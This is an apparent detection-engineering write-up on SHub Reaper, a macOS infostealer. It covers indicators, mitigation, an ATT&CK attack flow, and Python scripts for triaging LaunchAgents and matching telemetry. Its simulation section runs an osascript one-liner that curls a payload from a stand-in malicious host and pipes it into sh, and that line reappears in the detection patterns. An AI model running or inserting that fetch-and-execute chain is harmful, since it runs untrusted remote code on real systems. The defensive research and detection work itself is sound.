SHub Reaper | macOS Stealer Spoofs Apple, Google, and Microsoft in a Single Attack Chain
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report analyzes a new macOS infostealer variant called SHub Reaper, which uses fake WeChat and Miro installers to deliver a malicious AppleScript payload through a typo-squatted Microsoft-themed domain. Once launched in Script Editor, the payload collects browser data, cryptocurrency wallet files, and keychain information, then exfiltrates the stolen content as chunked ZIP archives. The malware also tampers with wallet files and establishes persistence through a LaunchAgent disguised as a Google software update. Recommended detection focuses on AppleScript execution, suspicious LaunchAgent creation, and outbound traffic to the known command-and-control infrastructure.
Investigation
SentinelOne tracked the full multi-stage delivery chain, including abuse of the applescript:// scheme, dynamic generation of the AppleScript payload, and a file-grabbing module that mirrors the document theft behavior seen in AMOS. Researchers captured network traffic to the command-and-control domain hebsbsbzjsjshduxbs.xyz and related endpoints, along with creation of temporary files under /tmp and a LaunchAgent placed in the user’s Library directory. The investigation also uncovered hard-coded Telegram bot functionality used for operator telemetry.
Mitigation
Defenders should block access to the typo-squatted domains mlcrosoft.co.com, qq-0732gwh22.com, and mlroweb.com, and monitor for LaunchAgents created under paths that imitate Google update components. Application allow-listing should be used to restrict AppleScript execution from untrusted sources, and strict code-signing verification should be enforced. Network detections should also alert on communication with the identified command-and-control domain and its known API paths.
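One way to implement the LaunchAgent monitoring recommended above, as an added example rather than code from the report or from SentinelOne: a small Python triage script that reads each plist in a user's LaunchAgents directory and flags Google- or Keystone-themed agents whose command never references the genuine Keystone install location, that run a script or an interpreter instead of a signed binary, or that fire on a beacon-like StartInterval (the report describes a 60 s cadence). The known-good prefix Library/Google/GoogleSoftwareUpdate/ is an assumption about where the legitimate agent lives, and the three plists in the block are constructed samples, not artefacts from the report.

```python
"""Triage user LaunchAgents for Google-update look-alikes (added example, not SentinelOne code)."""
import plistlib
from pathlib import Path

# Assumption: the genuine Keystone agent executes from this prefix under the user's
# home directory; it is used only as a known-good reference for comparison.
GENUINE_PREFIX = "Library/Google/GoogleSoftwareUpdate/"
GOOGLE_MARKERS = ("google", "keystone")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}


def assess_launch_agent(plist_bytes: bytes, plist_name: str) -> list:
    """Return findings for one LaunchAgent plist; an empty list means nothing suspicious."""
    try:
        data = plistlib.loads(plist_bytes)
    except Exception as exc:  # a malformed plist is itself worth a look
        return [f"unparseable plist: {exc}"]

    label = str(data.get("Label", ""))
    args = [str(a) for a in data.get("ProgramArguments", [])]
    program = str(data.get("Program", "")) or (args[0] if args else "")
    command = " ".join(args) if args else program

    # Only plists that present themselves as Google/Keystone components are judged here.
    if not any(m in (label + " " + plist_name).lower() for m in GOOGLE_MARKERS):
        return []

    findings = []
    # 1. The command never touches the genuine Keystone install location.
    if GENUINE_PREFIX not in command:
        findings.append(f"{label!r}: command does not reference {GENUINE_PREFIX}: {command}")
    # 2. The agent runs a script or an interpreter rather than a signed binary
    #    (the report's persistence stage runs a 'GoogleUpdate' script).
    if Path(program).name in INTERPRETERS or any(a.endswith((".sh", ".scpt")) for a in args):
        findings.append(f"{label!r}: runs a script or interpreter: {program}")
    # 3. A very short StartInterval matches the 60 s heartbeat described in the report.
    interval = data.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:
        findings.append(f"{label!r}: StartInterval {interval}s is beacon-like")
    return findings


def scan_launch_agents(directory: Path) -> dict:
    """Assess every .plist in a LaunchAgents directory; returns {filename: findings}."""
    results = {}
    for plist in sorted(directory.glob("*.plist")):
        findings = assess_launch_agent(plist.read_bytes(), plist.name)
        if findings:
            results[plist.name] = findings
    return results


# Constructed sample plists for the example (not real artefacts from the report).
GENUINE_LIKE = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": ["/Users/alice/Library/Google/GoogleSoftwareUpdate/"
                         "GoogleSoftwareUpdate.bundle/Contents/Resources/"
                         "GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent"],
    "StartInterval": 3600,
})
LOOKALIKE = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": ["/bin/sh", "/Users/alice/Library/Application Support/GoogleSoftwareUpdate/GoogleUpdate"],
    "StartInterval": 60,
    "RunAtLoad": True,
})
UNRELATED = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/bin/sh", "/opt/backup.sh"],
    "StartInterval": 60,
})

if __name__ == "__main__":
    for blob in (GENUINE_LIKE, LOOKALIKE):
        print(assess_launch_agent(blob, "com.google.keystone.agent.plist") or "clean")
    live = Path.home() / "Library" / "LaunchAgents"
    if live.is_dir():
        print(scan_launch_agents(live) or "no Google-themed findings")
```

The three checks are deliberately independent: a look-alike that hides its script under the genuine GoogleSoftwareUpdate directory still trips the interpreter and interval checks, and plists that do not pose as Google components are ignored so the script stays quiet on unrelated agents.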
Response
If SHub Reaper activity is detected, isolate the affected endpoint immediately, terminate any suspicious AppleScript or LaunchAgent processes, and remove the malicious files from /tmp and the user Library. Investigators should then perform full forensic collection of browser data stores, wallet directories, and credential repositories, followed by credential resets where compromise is suspected. The identified command-and-control infrastructure should be blocked, and the incident response team should begin broader threat hunting across the environment.
Attack Flow

```mermaid
graph TB
  %% Class Definitions
  classDef action fill:#99ccff
  classDef tool fill:#ffcc99
  classDef malware fill:#ff9999
  classDef operator fill:#ff9900

  %% Nodes – Attack Steps
  step_initial_access["<b>Technique</b> – <b>T1659 Content Injection</b>: Compromised lure websites (fake WeChat or Miro) host malicious applescript:// URLs that deliver the payload"]
  class step_initial_access action
  step_execution["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b>: AppleScript opened in Script Editor runs a hidden base64-encoded curl call that decodes and executes the stager"]
  class step_execution action
  step_code_retrieval["<b>Technique</b> – <b>T1505 Server Software Component</b>: AppleScript downloads core malicious AppleScript from a remote server"]
  class step_code_retrieval action
  step_credential_capture["<b>Technique</b> – <b>T1056 Input Capture</b>: AppleScript prompts the user for a password and harvests Keychain data"]
  class step_credential_capture action
  step_data_collection["<b>Technique</b> – <b>T1074.001 Local Data Staging</b>: Filegrabber scans Desktop and Documents for target extensions and stages them in /tmp/shub_<rand>"]
  class step_data_collection action
  step_archive["<b>Technique</b> – <b>T1560.001 Archive via Utility</b>: Collected files are zipped and split into 70 MB chunks"]
  class step_archive action
  step_exfiltration["<b>Technique</b> – <b>T1011 Exfiltration Over Other Network Medium</b>: Chunks are uploaded via HTTPS to the command-and-control server"]
  class step_exfiltration action
  step_wallet_hijack["<b>Techniques</b> – <b>T1553.002 Code Signing</b> and <b>T1036.001 Masquerading</b>: Malicious app.asar files replace legitimate wallet binaries, using ad-hoc or invalid code signatures to bypass Gatekeeper"]
  class step_wallet_hijack action
  step_persistence["<b>Techniques</b> – <b>T1037.002 Login Hook</b>, <b>T1176 Software Extensions</b> and <b>T1574.007 Path Interception</b>: Fake Google Software Update directory with a LaunchAgent plist (com.google.keystone.agent.plist) placed in PATH to achieve persistent execution"]
  class step_persistence action
  step_backdoor["<b>Technique</b> – <b>T1219 Remote Access Tools</b>: LaunchAgent executes GoogleUpdate script every 60 s, beacons to /api/bot/heartbeat and can run additional commands"]
  class step_backdoor malware

  %% Nodes – Tools / Components
  tool_applescript["<b>Tool</b> – <b>Name</b>: AppleScript<br/><b>Description</b>: Script executed via Script Editor to decode and launch the payload"]
  class tool_applescript tool
  tool_curl["<b>Tool</b> – <b>Name</b>: curl<br/><b>Description</b>: Used to download additional AppleScript and data files over HTTPS"]
  class tool_curl tool
  tool_launchagent["<b>Tool</b> – <b>Name</b>: LaunchAgent<br/><b>Description</b>: macOS user-level persistence mechanism defined by a plist"]
  class tool_launchagent tool
  malware_stager["<b>Malware</b> – <b>Name</b>: Stager<br/><b>Description</b>: Small loader that fetches the main AppleScript payload"]
  class malware_stager malware

  %% Edges – Flow
  step_initial_access -->|leads to| step_execution
  step_execution -->|uses| tool_applescript
  step_execution -->|executes| malware_stager
  malware_stager -->|downloads via| tool_curl
  malware_stager -->|triggers| step_code_retrieval
  step_code_retrieval -->|uses| tool_curl
  step_code_retrieval -->|enables| step_credential_capture
  step_credential_capture -->|captures| step_data_collection
  step_data_collection -->|stages files for| step_archive
  step_archive -->|creates chunks for| step_exfiltration
  step_exfiltration -->|delivers to| step_wallet_hijack
  step_wallet_hijack -->|modifies| step_persistence
  step_persistence -->|installs| tool_launchagent
  tool_launchagent -->|provides| step_backdoor
  step_backdoor -->|acts as| malware_stager

  %% Class Assignments
  class step_initial_access,step_execution,step_code_retrieval,step_credential_capture,step_data_collection,step_archive,step_exfiltration,step_wallet_hijack,step_persistence,step_backdoor action
  class tool_applescript,tool_curl,tool_launchagent tool
  class malware_stager,step_backdoor malware
```
Detections
- Possible IP Lookup Domain Communications Attempted (via dns)
- Forced Code Signing of Modified Application Bundle (via cmdline)
- MacOS Archive Utility Pointing To Suspicious Directory (via cmdline)
- Suspicious Curl Execution Attempt [MacOS] (via cmdline)
- Archive Was Created In MacOS Temporary Folder (via file_event)
- Possible Base64 Encoded Strings Manipulation (via cmdline)
- IOCs (HashSha256) to detect: SHub Reaper | macOS Stealer Spoofs Apple, Google, and Microsoft in a Single Attack Chain
- IOCs (HashMd5) to detect: SHub Reaper | macOS Stealer Spoofs Apple, Google, and Microsoft in a Single Attack Chain
- Detection of SHub Reaper Infection Chain Using Typo-Squatted and C2 Domains [Webserver]
- Detect SHub Reaper Malware Execution via AppleScript and Curl [Linux Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
- Attack Narrative & Commands:
  The attacker crafts a concise one-liner that leverages osascript to execute a shell command. Within the AppleScript, do shell script runs curl to download a remote shell script (payload.sh) and pipes it directly into sh for execution. Because the entire chain is embedded in a single AppleScript invocation, macOS logs a single process_creation event whose command line contains both osascript and curl, satisfying the detection rule.
- Regression Test Script:

  ```bash
  #!/bin/bash
  #
  # Simulate SHub Reaper execution on macOS.
  # Generates a single process_creation event containing both 'osascript' and 'curl'.
  #
  MALICIOUS_URL="https://malicious.example.com/payload.sh"

  # One-liner: osascript runs a shell command that curls the payload and executes it.
  # The inner quotes are escaped so AppleScript receives one string literal.
  osascript -e "do shell script \"curl -s ${MALICIOUS_URL} | sh\""
  ```

- Cleanup Commands:

  ```bash
  #!/bin/bash
  #
  # Clean up any artefacts created by the simulation.
  # The payload runs in memory and does not write files, but we ensure no lingering processes.
  #
  # Kill any stray 'sh' processes started by the test (use with caution on production systems).
  pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"
  ```
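The rule themes listed under Detections and the single process_creation event the simulation narrative describes, worked through as detection logic over constructed telemetry. This is an added example, not SentinelOne's or the platform's own rule content; the domains, the /api/bot/heartbeat path and the /tmp/shub_ staging prefix are taken from the report above, while the event schema (type, cmdline, query, host, path) and every sample event are assumptions made for the example.

```python
"""Evaluate sample telemetry against the SHub Reaper indicators and rule themes above
(added example; not SentinelOne's or the platform's own detection code)."""
import re

# Indicators quoted from the report: typo-squatted lure domains, the C2 domain,
# its heartbeat endpoint and the /tmp staging prefix.
C2_DOMAINS = {"hebsbsbzjsjshduxbs.xyz", "mlcrosoft.co.com", "qq-0732gwh22.com", "mlroweb.com"}
C2_PATHS = ("/api/bot/heartbeat",)
STAGING_PREFIX = "/tmp/shub_"
SHELLS = r"(?:sh|bash|zsh)"


def classify(event: dict) -> list:
    """Return the names of the rule themes an event matches (empty list if none)."""
    hits = []
    kind = event.get("type")
    if kind == "process_creation":
        cmd = event.get("cmdline", "")
        low = cmd.lower()
        # Simulation narrative: one process_creation event carrying both osascript and curl.
        if "osascript" in low and "curl" in low:
            hits.append("applescript_curl_chain")
        # Suspicious curl execution: a download piped straight into a shell.
        if re.search(r"\bcurl\b.*\|\s*" + SHELLS + r"\b", low):
            hits.append("curl_pipe_to_shell")
        # Base64 decode on the command line (macOS base64 takes -D; GNU takes -d/--decode).
        if re.search(r"\bbase64\s+(?:-d|-D|--decode)\b", cmd):
            hits.append("base64_decode")
        # Forced re-signing of an application bundle.
        if re.search(r"\bcodesign\b.*\s(?:--force|-f)\b", low) and ".app" in low:
            hits.append("forced_codesign")
        # Archive utility writing into /tmp.
        if re.search(r"\b(?:zip|ditto|tar)\b.*\s/tmp/", low):
            hits.append("archive_utility_tmp")
    elif kind == "dns":
        query = event.get("query", "").lower().rstrip(".")
        if query in C2_DOMAINS or any(query.endswith("." + d) for d in C2_DOMAINS):
            hits.append("known_c2_domain")
    elif kind == "http":
        if event.get("host", "").lower() in C2_DOMAINS:
            hits.append("known_c2_domain")
        if event.get("path", "").startswith(C2_PATHS):
            hits.append("c2_api_path")
    elif kind == "file_event":
        path = event.get("path", "")
        if path.startswith("/tmp/") and path.lower().endswith((".zip", ".tar", ".gz", ".7z")):
            hits.append("archive_created_tmp")
        if path.startswith(STAGING_PREFIX):
            hits.append("shub_staging_dir")
    return hits


def triage(events: list) -> list:
    """Return (index, hits) for every event that matched at least one rule theme."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


# Constructed sample telemetry: the domains and paths are the report's, everything else is made up.
SAMPLE_EVENTS = [
    {"type": "process_creation",
     "cmdline": 'osascript -e "do shell script \\"curl -s https://malicious.example.com/payload.sh | sh\\""'},
    {"type": "process_creation", "cmdline": "curl -s https://example.com/readme.txt -o /tmp/readme.txt"},
    {"type": "dns", "query": "hebsbsbzjsjshduxbs.xyz."},
    {"type": "dns", "query": "www.apple.com"},
    {"type": "http", "host": "hebsbsbzjsjshduxbs.xyz", "path": "/api/bot/heartbeat?id=abc"},
    {"type": "file_event", "path": "/tmp/shub_k3j2/Documents.zip"},
    {"type": "process_creation", "cmdline": "echo aGVsbG8= | base64 -D"},
    {"type": "process_creation", "cmdline": "codesign --force --sign - /Applications/WalletApp.app"},
    {"type": "process_creation", "cmdline": "zip -r /tmp/shub_k3j2/Documents.zip /Users/alice/Documents"},
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["type"], ", ".join(hits))
```

The second sample event (a plain curl download to a file) matches nothing, which is the point of keying the curl rule on the pipe into a shell rather than on curl alone; the archive theme is split into a command-line variant and a file-event variant because the Detections list above carries both telemetry sources.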